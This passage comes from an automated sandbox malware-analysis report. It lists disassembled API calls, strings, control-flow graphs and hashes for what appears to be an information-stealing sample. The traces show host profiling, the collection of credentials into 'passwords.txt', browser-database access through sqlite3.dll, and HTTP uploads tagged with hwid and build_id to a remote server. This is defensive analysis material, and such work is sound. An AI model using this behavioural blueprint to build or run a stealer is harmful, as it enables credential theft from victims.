                                                                                                                                                                                                                              • Part of subcall function 00410C28: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C4F
                                                                                                                                                                                                                              • Part of subcall function 00411538: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0041154A
                                                                                                                                                                                                                              • Part of subcall function 00411538: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411555
                                                                                                                                                                                                                              • Part of subcall function 00411538: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00411560
                                                                                                                                                                                                                              • Part of subcall function 00411538: ReleaseDC.USER32(00000000,00000000), ref: 0041156B
                                                                                                                                                                                                                              • Part of subcall function 00411538: GetProcessHeap.KERNEL32(00000000,00000104,?,?,004140D8,?,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000,Computer Name: ,004368D8,AV: ,004368CC), ref: 00411577
                                                                                                                                                                                                                              • Part of subcall function 00411538: HeapAlloc.KERNEL32(00000000,?,?,004140D8,?,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000,Computer Name: ,004368D8,AV: ,004368CC,Install Date: ), ref: 0041157E
                                                                                                                                                                                                                              • Part of subcall function 00411538: wsprintfA.USER32 ref: 00411590
                                                                                                                                                                                                                              • Part of subcall function 00410DB0: GetKeyboardLayoutList.USER32(00000000,00000000,0043670A,?,?), ref: 00410DE1
                                                                                                                                                                                                                              • Part of subcall function 00410DB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410DEF
                                                                                                                                                                                                                              • Part of subcall function 00410DB0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410DFD
                                                                                                                                                                                                                              • Part of subcall function 00410DB0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E2C
                                                                                                                                                                                                                              • Part of subcall function 00410DB0: LocalFree.KERNEL32(00000000), ref: 00410ED4
                                                                                                                                                                                                                              • Part of subcall function 00410D03: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D1E
                                                                                                                                                                                                                              • Part of subcall function 00410D03: HeapAlloc.KERNEL32(00000000), ref: 00410D25
                                                                                                                                                                                                                              • Part of subcall function 00410D03: GetTimeZoneInformation.KERNEL32(?), ref: 00410D34
                                                                                                                                                                                                                              • Part of subcall function 00410D03: wsprintfA.USER32 ref: 00410D52
                                                                                                                                                                                                                              • Part of subcall function 00410F26: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934), ref: 00410F3A
                                                                                                                                                                                                                              • Part of subcall function 00410F26: HeapAlloc.KERNEL32(00000000,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934,Keyboard Languages: ,00436918), ref: 00410F41
                                                                                                                                                                                                                              • Part of subcall function 00410F26: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436890,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ), ref: 00410F5F
                                                                                                                                                                                                                              • Part of subcall function 00410F26: RegQueryValueExA.KERNEL32(00436890,00000000,00000000,00000000,000000FF,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000), ref: 00410F7B
                                                                                                                                                                                                                              • Part of subcall function 00410F26: RegCloseKey.ADVAPI32(00436890,?,?,?,00414292,Processor: ,[Hardware],00436958,00000000,TimeZone: ,00436948,00000000,Local Time: ,00436934,Keyboard Languages: ,00436918), ref: 00410F84
                                                                                                                                                                                                                              • Part of subcall function 00410FDC: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00411052
                                                                                                                                                                                                                              • Part of subcall function 00410FDC: wsprintfA.USER32 ref: 004110B0
                                                                                                                                                                                                                              • Part of subcall function 00410F8F: GetSystemInfo.KERNEL32(?), ref: 00410FA9
                                                                                                                                                                                                                              • Part of subcall function 00410F8F: wsprintfA.USER32 ref: 00410FC1
                                                                                                                                                                                                                              • Part of subcall function 004110EE: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436918,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000,Computer Name: ,004368D8,AV: ,004368CC,Install Date: ), ref: 00411106
                                                                                                                                                                                                                              • Part of subcall function 004110EE: HeapAlloc.KERNEL32(00000000), ref: 0041110D
                                                                                                                                                                                                                              • Part of subcall function 004110EE: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411129
                                                                                                                                                                                                                              • Part of subcall function 004110EE: wsprintfA.USER32 ref: 0041114F
                                                                                                                                                                                                                              • Part of subcall function 00411167: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111BE
                                                                                                                                                                                                                              • Part of subcall function 0041147A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0043670F,?,?), ref: 004114A9
                                                                                                                                                                                                                              • Part of subcall function 0041147A: Process32First.KERNEL32(00000000,00000128), ref: 004114B9
                                                                                                                                                                                                                              • Part of subcall function 0041147A: Process32Next.KERNEL32(00000000,00000128), ref: 00411517
                                                                                                                                                                                                                              • Part of subcall function 0041147A: CloseHandle.KERNEL32(00000000), ref: 00411522
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670E,00000000,?,?), ref: 00411248
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00411285
                                                                                                                                                                                                                              • Part of subcall function 004111D8: wsprintfA.USER32 ref: 004112B2
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112D1
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411307
                                                                                                                                                                                                                              • Part of subcall function 004111D8: lstrlenA.KERNEL32(?), ref: 0041131C
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E94), ref: 004113B1
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegCloseKey.ADVAPI32(?), ref: 0041141B
                                                                                                                                                                                                                              • Part of subcall function 004111D8: RegCloseKey.ADVAPI32(?), ref: 00411447
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436918,Display Resolution: ,004368FC,00000000,User Name: ,004368EC,00000000), ref: 004145A3
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                                                                            • String ID: 11.1$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                                                                            • API String ID: 23247351-3666103263

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186C6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186DD
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004186F4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041870B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418722
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418739
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418750
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418767
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041877E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418795
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187AC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187C3
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187DA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 004187F1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418808
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041881F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418836
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041884D
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418864
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041887B
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,00418504), ref: 0041888C
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,00418504), ref: 0041889D
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,00418504), ref: 004188AE
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,00418504), ref: 004188BF
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,00418504), ref: 004188D0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75A70000,00418504), ref: 004188EC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75290000,00418504), ref: 00418907
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 0041891E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75BD0000,00418504), ref: 00418939
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75450000,00418504), ref: 00418954
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(76E90000,00418504), ref: 0041896F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32 ref: 00418986
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2238633743-0

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0041076A: StrCmpCA.SHLWAPI(?,?,?,0040886E,?,?,?), ref: 00410773
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040894C
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00412285: _memset.LIBCMT ref: 004122AC
                                                                                                                                                                                                                              • Part of subcall function 00412285: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00412352
                                                                                                                                                                                                                              • Part of subcall function 00412285: TerminateProcess.KERNEL32(00000000,00000000), ref: 00412360
                                                                                                                                                                                                                              • Part of subcall function 00412285: CloseHandle.KERNEL32(00000000), ref: 00412367
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AB1
                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00408AB8
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR_V128), ref: 00408BA2
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004371E0), ref: 00408BBB
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004371E4), ref: 00408BE3
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00408D03
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00408D1E
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00408D61
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                                                                            • String ID: ERROR_V128
                                                                                                                                                                                                                            • API String ID: 2819533921-2537946777
                                                                                                                                                                                                                            • Opcode ID: 64d338df601a607161d18948afcba58f8b43687a0c28428ee845618edde27115
                                                                                                                                                                                                                            • Instruction ID: 37fb0b20975b4b4c7a561ed522e3b0a52bc35175d85a44b4c07a7eb0ad9001ad
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64d338df601a607161d18948afcba58f8b43687a0c28428ee845618edde27115
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E12E72900209ABCF11FFA1ED469DD7B76AF04305F20502AF551B31A2DBB96E869F48

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrlenA.KERNEL32(?,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410524
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrcpyA.KERNEL32(00000000,00000000,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410556
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00416908: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041695C
                                                                                                                                                                                                                              • Part of subcall function 00416908: lstrlenA.KERNEL32(?), ref: 00416967
                                                                                                                                                                                                                              • Part of subcall function 00416908: StrStrA.SHLWAPI(00000000,?), ref: 0041697C
                                                                                                                                                                                                                              • Part of subcall function 00416908: lstrlenA.KERNEL32(?), ref: 0041698B
                                                                                                                                                                                                                              • Part of subcall function 00416908: lstrlenA.KERNEL32(00000000), ref: 004169A4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AE2
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B3B
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B9B
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF4
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416C0A
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416C20
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416C32
                                                                                                                                                                                                                            • Sleep.KERNEL32(0000EA60), ref: 00416C41
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$pvA$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                                                                            • API String ID: 2840494320-2416438311
                                                                                                                                                                                                                            • Opcode ID: 5d47d3a7fc90dc90f05e4ded83c2600598b2ad355a675c98f79175fb2a130361
                                                                                                                                                                                                                            • Instruction ID: 809798b9d7f536d65c9f0d42a81ce9458fba830cc6cfafc1e851dda3864c9776
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d47d3a7fc90dc90f05e4ded83c2600598b2ad355a675c98f79175fb2a130361
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07913F71E00219ABCF10FB65DD47ACC7775AF04748F51802AF915B7192DBB8AE898B8C

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 004085D8
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040862D
                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00408634
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004086D2
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 004086EB
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 004086F5
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,0043719C), ref: 00408701
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0040870B
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,004371A0), ref: 00408717
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00408724
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 0040872E
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,004371A4), ref: 0040873A
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00408747
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00408751
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,004371A8), ref: 0040875D
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?), ref: 0040876A
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00408774
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,004371AC), ref: 00408780
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,004371B0), ref: 0040878C
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 004087C5
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00408812
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                                            • String ID: passwords.txt
                                                                                                                                                                                                                            • API String ID: 1956182324-347816968
                                                                                                                                                                                                                            • Opcode ID: 27a51afabc24c2e1730f56ff00952360d44b75554297647121cc2a500c06b5d8
                                                                                                                                                                                                                            • Instruction ID: 74ea50bb4acefddd9f23d1abfd6bb78663670087d182b85c349bcd99e5a28896
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27a51afabc24c2e1730f56ff00952360d44b75554297647121cc2a500c06b5d8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5813B32900208BBCF15FBA1ED4A9DD7B76AF08306F105026F601B31B1DBBA5E559B99

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 2260 404b2e-404bf3 call 4104ee call 404ab6 call 4104bc * 5 InternetOpenA StrCmpCA 2275 404bf5 2260->2275 2276 404bfb-404c01 2260->2276 2275->2276 2277 405194-405236 InternetCloseHandle call 402920 * 8 call 41d05a 2276->2277 2278 404c07-404d91 call 411c1f call 41059c call 410562 call 402920 * 2 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 41059c call 410562 call 402920 * 2 InternetConnectA 2276->2278 2278->2277 2347 404d97-404dd1 HttpOpenRequestA 2278->2347 2348 404dd7-404ddd 2347->2348 2349 405188-40518e InternetCloseHandle 2347->2349 2350 404dfb-40511a call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 4105de call 410562 call 402920 call 41059c call 410562 call 402920 call 4104bc call 41059c * 2 call 410562 call 402920 * 2 lstrlenA * 2 HttpSendRequestA 2348->2350 2351 404ddf-404df5 InternetSetOptionA 2348->2351 2349->2277 2454 40515c-405174 InternetReadFile 2350->2454 2351->2350 2455 405176-405183 InternetCloseHandle call 402920 2454->2455 2456 40511c-405124 2454->2456 2455->2349 2456->2455 2458 405126-405157 call 4105de call 410562 call 402920 2456->2458 2458->2454
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404D83
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00404DC7
                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404DF5
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,00436947,",build_id,004377BC,------,004377B0,",hwid,0043779C,------), ref: 004050EE
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00405101
                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,?,00000000), ref: 0040510F
                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040516C
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405177
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040518E
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0040519A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                                                                                                                                                            • String ID: "$"$------$------$------$build_id$hwid$zwA
                                                                                                                                                                                                                            • API String ID: 3006978581-2086870335
                                                                                                                                                                                                                            • Opcode ID: 39ee05ec24a1b7a2e2ef0f0556164a6fe9c2841affaa1a713c40df59af8ac870
                                                                                                                                                                                                                            • Instruction ID: 53fd68ce47623ecae43c8496bc80cdb8daf13b4ed4eb58a46398de8c539df4ef
